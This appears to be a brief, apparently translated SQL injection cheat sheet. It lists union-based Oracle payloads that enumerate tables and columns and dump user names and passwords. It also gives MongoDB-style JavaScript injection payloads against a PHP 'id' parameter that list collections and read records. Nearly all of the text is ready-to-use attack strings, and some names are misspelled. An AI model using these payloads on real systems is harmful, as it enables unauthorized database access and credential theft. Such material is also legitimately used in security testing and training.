0x00 Introduction to sql injection
Common databases injected: mysql, mssql, oralce, Mdb, postsql, etc.
Types of sql injection: numeric type, character type, etc.
Submission method: post, get, http header in the data packet, cookie, etc.
Other injection methods: secondary Injection, out-of-line injection testing, etc.
0x01 Basic injection statement of oralce
oracle uses user-tables to store table names
In addition to general query statements, fuzzy queries are usually used to query related user tables, etc.
Test echo: and 1=2 union select '1','2' from dual
burst database: and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
fuzzy burst database: and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual
burst column name: and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual
burst other column names: and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual
burst data: and 1=2 union select user_name,user_pwd from "sns_users"
burst other data :and 1=2 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'
0x02 Basic injection statement of Mdb
It should be noted that the closing method of Mdb is '{(1'});
test echo: /new_list.php?id=1'}); return ({title:1,content:'2
burst library: /new_list.php?id=1'}); return ({title:tojson(db),content:'1
burst table: /new_list.php?id=1'}); return({title:tojson(db.getCollectionNames()), content:'1
burst field:/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1
db.getCollectionNames() returns an array, which needs to be converted to a string with tojson.
db.Authority_confidential is the currently used collection (table), the find function is used for query, 0 is the first data